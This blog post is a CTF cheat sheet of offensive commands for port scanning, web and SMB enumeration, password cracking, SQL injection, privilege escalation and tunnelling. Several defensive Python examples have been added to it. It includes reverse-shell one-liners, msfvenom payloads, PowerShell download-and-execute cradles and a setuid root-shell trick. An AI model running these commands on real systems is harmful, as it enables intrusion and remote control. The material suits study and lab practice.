Essential Hacking Tools for CTF Success

A curated list of my most effective and frequently used hacking tools for Capture the Flag challenges.

Content in this Blog Post

In this blog post I will discuss the hack tools I used most throughout tons of CTFs.

Hack tools I used most

Over the past six months, I have been diving into countless Capture the Flag (CTF) challenges on, a very good platform for learning about cybersecurity. CTFs are a crucial part of cybersecurity education, involving breaking into misconfigured (often outdated) systems and extracting text from a specific file to demonstrate successful access. This process is incredibly addictive and as enjoyable as playing a great video game.

A significant aspect of excelling at CTFs is mastering the tools at your disposal. At first, the sheer variety of tools can be overwhelming, making it easy to overlook some of them or forget about them. To keep track, I have been documenting all the tools and commands I frequently use, find particularly effective, or consider less obvious.

Table of contents


The most well-known port scanning tool. Slow, but it can do it all!

sudo nmap -sS
sudo nmap -A
sudo nmap -O -sV
sudo nmap -sV -vv
sudo nmap -sN -vvv
nmap --script ssl-enum-ciphers,ssl-heartbleed -p 443

passive recon



My go-to tool for scanning ports, extremely fast. It detects open ports first, and then tries to get info about the services on those ports from nmap. This is a loud tool, i.e. it will trigger alarms when used for real, but who cares when doing CTFs. This is just a pure joy to use.

rustscan --ulimit 5000 -r 1-65535 -a -- -A
rustscan -t 2000 --ulimit 5000 -r 1-65535 -a -- -Pn -A -sV

web enumeration

Check out the common flags I used.

gobuster -u -x "txt,php,html" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir
gobuster -u "" -x ",txt" -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  dir --exclude-length 1763
gobuster -b '301,404' -u "" -x ",html,php" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt dir  # blacklist status codes
ffuf -X POST -d "username=USER&password=PASS" -H "Content-Type: application/x-www-form-urlencoded" -w "./usernames.txt:USER" -w "./passwords.txt:PASS" -u -fs 4478  # Set correct headers 
curl http:/ | md5sum # look up in owasp favicon database
nikto -h

subdomain enumeration

Subfinder works crazy well. Virtual hosting is good to know about.
# database to look up subdomains
./subfinder -d  # go tool subfinder
ffuf -w ./wordlist.txt -u -H "Host:" -fs <size>   # detect virtual hosting

useful wordlists for web enumeration

Very well-known wordlists; these are the ones I found most useful for the CTFs I encountered.


smb enumeration

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
smbclient //
smbget -R smb://
smbclient -U milesdyson%")s{A&2Z=F^n_E.B\`" // # example of password login; note the quotes around the password
smbclient -W WORKGROUP -U Anonymous //
enum4linux -a
enum4linux -u milesdyson -p ')s{A&2Z=F^n_E.B`'  -a
auxiliary/scanner/smb/smb_login  # metasploit


sudo nmap -p 2049,111 --script='nfs-*' -d
showmount -e

ftp enumeration

The banner grab can also be used for other services.

sudo nmap --script "ftp-*" -p21  # quote the glob so the shell does not expand it against local files
nc -nv 21  # banner grab


Incredibly useful password hash cracking tool, but do a search first to check whether your hash has already been cracked; that saves a lot of time. Check out the subformats as well, I had to use that functionality on multiple occasions. If john can't do it, hashcat is another good tool, and that is the only time I switch to it.

john --list=formats
john --list=subformats
john --format=Raw-SHA512 --rules -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt
# subformat syntax
john --format=dynamic_82 --rules -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt


SQL injection is very unfun and tedious to do by hand. sqlmap is also very loud, but for CTFs that does not matter; it saves a ton of time.

sqlmap -u --forms -a
sqlmap -u --cookie="PHPSESSID=lr3l0hnc6gm9a4clunvbgv1vt0" --forms -a
sqlmap -r request_file.txt -a       # You could copy requests from burpsuite and use them like this

GTFO bins

For Linux priv escalation this is the stuff. For Windows you can check out LOLBAS.

root bash

Used this whenever possible.

cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
./rootbash -p

If you manage to get these lines executed as root you are in. I use this most often when a backup mechanism (run as root) can be manipulated. This is a very well-known technique; look it up to learn how it works.


Local copy of the Exploit-DB database that you can search from the command line; very useful.

searchsploit -w query
searchsploit -p exploitnumber

find commands

Find is always available on Linux systems. I usually run these to find the low-hanging fruit before moving on to priv escalation scripts such as linpeas. Especially for the easy CTFs these commands can point you to the intended priv escalation vector.

find / -type f \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -user your_username 2>/dev/null
find . -type f -executable -print
getcap -r / 2>/dev/null
find / -name root.txt -exec cat {} \; 2>/dev/null 
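As an added example that is not part of the original post, here is the defender's counterpart to the find sweep above and to the /tmp/rootbash trick: a Python audit that lists setuid/setgid files and flags the ones that look planted. The BASELINE set, the SCRATCH_DIRS tuple and the SAMPLE entries are constructed for illustration.

```python
import os
import stat

# Constructed baseline: setuid/setgid binaries this host is expected to ship.
# A real audit would take this from the package manager or a golden image.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def find_setuid_files(root):
    """Same selection as `find root -perm -u+s -o -perm -g+s`: yield
    (path, mode) for every regular file with the setuid or setgid bit set."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable or vanished, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode


def triage(entries, baseline=BASELINE):
    """Sort (path, mode) pairs into expected, planted and unknown.
    'planted' covers the /tmp/rootbash recipe: a setuid file in a scratch or
    home directory, or a setuid copy of a shell anywhere on the box."""
    report = {"expected": [], "planted": [], "unknown": []}
    for path, mode in entries:
        base = os.path.basename(path)
        if path in baseline:
            report["expected"].append(path)
        elif path.startswith(SCRATCH_DIRS) or base in SHELLS or base.endswith("bash"):
            report["planted"].append(path)
        else:
            report["unknown"].append(path)
    return report


# Constructed sample, as the walker would return it on a compromised host.
SAMPLE = [
    ("/usr/bin/sudo", 0o104755),
    ("/tmp/rootbash", 0o104755),          # the copy made by the recipe above
    ("/usr/local/bin/bash", 0o104755),    # setuid shell outside a scratch dir
    ("/opt/backup/helper", 0o102755),     # setgid, not in baseline: review it
]

if __name__ == "__main__":
    for bucket, paths in triage(SAMPLE).items():
        print(bucket, paths)
```

Run `triage(list(find_setuid_files("/")))` as root to audit a live box; anything in the planted bucket deserves an immediate look.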

tty from reverse shell

You have a reverse shell but you want more features. I almost always use these.

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

reverse shells

Many options for different scenarios.

nc 4444 -e /bin/sh
bash -i >& /dev/tcp/ 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
msfvenom -p cmd/unix/reverse_netcat lhost=[ip] lport=4444 R
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f exe -o reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST= LPORT=5555 -f exe -o reverse.exe
curl > reverse.php

reverse shells documentation


A way I like to transfer files between machines.

nc -l -p 1234 > out.file
nc -w 3 1234 < in.file


A listener for your reverse shell to connect to. I almost exclusively use nc for this.

nc -lvnp 4444
rlwrap nc -lvnp 4444


Don’t really like this tool. But it can do so much that in most scenarios I end up using it for something, and sometimes it leads to results.

hydra -l username -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -t 4 ssh:// -VV
hydra -l user -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -t 16 ssh:// -VV
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp
hydra -l username -P /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt -V http-form-post '/login:username=^USER^&password=^PASS^:F=failed' -o hydra_results.txt
hydra -L .usernames.txt -p "passwordtospray" http-get '/:A=NTLM:F=401'    # ntlm passwordspray
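An added example, not from the original post: the sshd log trail hydra leaves behind, and a small Python classifier that separates the two modes shown above (one account hammered with a wordlist versus one password sprayed across many accounts). The auth.log lines are constructed, and the thresholds are assumptions to tune per host.

```python
import re
from collections import defaultdict

# sshd writes one of these per rejected attempt, for existing and unknown accounts.
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def classify_failures(lines, brute_threshold=10, spray_threshold=5):
    """Return {ip: {"brute_force": [users hit >= brute_threshold times],
    "distinct_users": n}} for every source that looks like hydra.
    Counts cover the whole input; on a live host run it per time window."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = FAILED.search(line)
        if m:
            per_ip[m["ip"]][m["user"]] += 1
    findings = {}
    for ip, users in per_ip.items():
        brute = sorted(u for u, n in users.items() if n >= brute_threshold)
        if brute or len(users) >= spray_threshold:
            findings[ip] = {"brute_force": brute, "distinct_users": len(users)}
    return findings


# Constructed auth.log excerpt (not a real capture):
#   10.0.0.5 -> 12 failures against root         (hydra -l root -P wordlist)
#   10.0.0.9 -> one failure each for 6 accounts  (hydra -L users -p password)
#   10.0.0.7 -> a single typo followed by a successful key login
SAMPLE_LOG = [
    f"Mar  3 10:00:{i:02d} host sshd[{1000 + i}]: Failed password for root "
    f"from 10.0.0.5 port {40000 + i} ssh2"
    for i in range(12)
] + [
    f"Mar  3 10:01:{i:02d} host sshd[{2000 + i}]: Failed password for invalid user "
    f"{u} from 10.0.0.9 port {50000 + i} ssh2"
    for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])
] + [
    "Mar  3 10:02:00 host sshd[3000]: Failed password for admin from 10.0.0.7 port 60000 ssh2",
    "Mar  3 10:02:01 host sshd[3001]: Accepted publickey for admin from 10.0.0.7 port 60001 ssh2",
]

if __name__ == "__main__":
    for ip, info in classify_failures(SAMPLE_LOG).items():
        print(ip, info)
```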

image analysis

I feel like this is exclusively useful for CTFs; I cannot imagine that this is useful in real scenarios. But more often than not stuff is hidden inside images or binaries, and these tools almost always lead to an answer. It does teach you a bit about binaries, file formats in general and metadata, so I understand why it is used so much in CTFs.

dd if=image.jpg bs=1 skip=265845
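An added example, not from the original post, showing where the skip value for a dd carve comes from: a Python walk of the JPEG marker structure that returns the offset just past the real EOI marker and the bytes appended after it. The sample image bytes and payload are constructed, and `_segment` is a helper for building them.

```python
SOI, EOI, SOS, TEM = 0xD8, 0xD9, 0xDA, 0x01
RST = range(0xD0, 0xD8)  # restart markers: legal inside entropy-coded data


def jpeg_end_offset(data):
    """Offset just past the real EOI marker, or -1 if not a complete JPEG.
    Segments with a length (APPn, DQT, DHT, SOF, SOS header) are skipped by
    that length, so an EXIF thumbnail's own FF D9 inside APP1 is ignored."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return -1
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return -1
        marker = data[pos + 1]
        if marker == 0xFF:                   # fill byte before a marker
            pos += 1
            continue
        pos += 2
        if marker == EOI:
            return pos
        if marker == TEM or marker in RST:   # standalone markers, no length
            continue
        if pos + 2 > len(data):
            return -1
        pos += int.from_bytes(data[pos:pos + 2], "big")  # length includes itself
        if marker == SOS:
            # In scan data an FF is followed by 00 (stuffing) or RSTn, so the
            # first FF followed by anything else is the next marker.
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] not in RST and data[pos + 1] not in (0x00, 0xFF)
            ):
                pos += 1
    return -1


def appended_data(data):
    """Bytes after the real EOI: what `dd if=image.jpg bs=1 skip=<offset>` carves."""
    end = jpeg_end_offset(data)
    return data[end:] if end >= 0 else b""


def _segment(marker, body):  # constructed helper: FF <marker>, length, body
    return bytes([0xFF, marker]) + (len(body) + 2).to_bytes(2, "big") + body


# Constructed sample, not a real file: APP1 carries a thumbnail with its own EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE1, b"Exif\x00\x00\xff\xd8\xff\xd9")   # APP1 with inner FF D9
    + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")          # SOS header
    + b"\x12\xff\x00\x34\xff\xd0\x56"                     # scan data: stuffing + RST0
    + b"\xff\xd9"                                         # the real EOI
)
PAYLOAD = b"PK\x03\x04 constructed hidden archive"
```

A naive `find(b"\xff\xd9")` on the sample stops at the thumbnail's marker and would carve from the wrong offset; the walk returns the true end of the image.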


socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0             # listener
socat OPENSSL:,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane  # reverse shell
./socat tcp-l:2222,fork,reuseaddr tcp: &  # start listener on 2222 forward to

chisel, tunnel through firewalls

Good to know this exists.

# Reverse port forward from attack box to remote, localhost:2049 will be forwarded to remote:2049
./chisel server -p 4242 --reverse  # Start reverse server that listens on 4242 on host
./chisel client server_ip:4242 R:2049:localhost:2049 &  # on remote connect back to host and reverse the connection

Start python server to share files

Use this all the time. Host your tools, curl them from the target to use them on the target.

python -m http.server 8000
sudo python -m http.server 80

hash identification

These websites I found most useful for identifying and finding already cracked hashes.


This resource has many super useful wordlists.


Very user-friendly exploit framework. Especially the meterpreter is very fun to have on Windows. Mostly quite straightforward to use; the things I wrote below are things I sometimes forgot.

get all exploits

in meterpreter: run post/multi/recon/local_exploit_suggester

check possible payloads when in exploit

show payloads

Try upgrading to a more capable shell

sessions -u 1  # upgrade session to meterpreter

Dump meterpreter directly on target

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe -o reverse.exe # dump payload on target
use exploit/multi/handler # listener module
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

cypher solving

CTFs like to include cyphers; they are fun to do once, but you encounter them too often in CTFs. Luckily I found these resources to be able to solve almost anything:
# check the auto solver
# Vigenère solver (use if the cypher looks like it can be solved by ROT but can't, and requires a key)
# runs a bunch of steganography tools on images

Connect to windows with remote desktop protocol

Good linux rdp tool

xfreerdp /u:administrator /p:letmein123! /v: /tls-seclevel:1
wlfreerdp /u:administrator /p:letmein123! /v: /tls-seclevel:1

curl on Windows

Invoke-WebRequest -uri -outfile C:\Windows\temp\socat.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','\Windows\Temp\reverse3.exe')
powershell "(New-Object System.Net.WebClient).Downloadfile('','reverse.exe')"
powershell iex (New-Object Net.WebClient).DownloadString('');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port 4444

pcap analysis

Also something that CTFs like to do. They give you captured packet files which you have to analyse and obtain credentials from. Sometimes tedious to do. tcpick formats those files very well.

tcpick -C -yP -r mypcap.pcapng | less -r
tcpick -wR -r mypcapfile  # creates files from tcp stream

Linux privilege escalation

Binary editing with vim

Fix files that have been broken on purpose.

vim -b file
:% !xxd
:% !xxd -r


gpg --import priv.key
gpg --decrypt encrypted.file


Port forwarding examples with ssh

ssh -L 8000: user@ -fN  # Local forward, local 8000 to through
ssh -L 8000: user@ -fN # Local forward to application on target
ssh -R 8000: kali@ -i KEYFILE -fN  # Reverse connection, on attacking machine, same result as previous command
ssh -D 8000 user@target.thm -fN  # Dynamic forward: SOCKS proxy on local port 8000, tunnelled through target


msf > use auxiliary/scanner/smtp/smtp_enum
msf > use auxiliary/scanner/smtp/smtp_version


telnet 1234
hydra -s 12345 -l username boris -P ./wordlist.txt -f pop3 -V


msf > use auxiliary/admin/mysql/mysql_sql
msf > use auxiliary/scanner/mysql/mysql_schemadump
msf > use auxiliary/scanner/mysql/mysql_hashdump


This tool is amazing. It's also incredibly easy to forget how it works. These are the commands I find most useful.

r2 -d -AA ./program.elf
afl                 # list all functions
db main             # set breakpoints
s main              # seek to main (shows its address)
v                   # visual mode
VV                  # panel view

## in visual mode
?                       # help in visual mode
"                       # Change window type in visual mode
pxr 256@r:SP            # (press e) In the window type stack, change stackview to something sensible
: e stack.size = 512    # Increase the size of the stack
: e asm.describe = true # describe assembly
w                       # window mode, change reorder windows
HJKL                    # resize in window mode

general buffer overflow tips

Tips for trying out buffer overflows with r2:
# connecting stdin to radare2 program
# be mindful when fuzzing to check whether you are writing a valid address into rip


echo -n "asdasdkjhfhj==" | base64 -d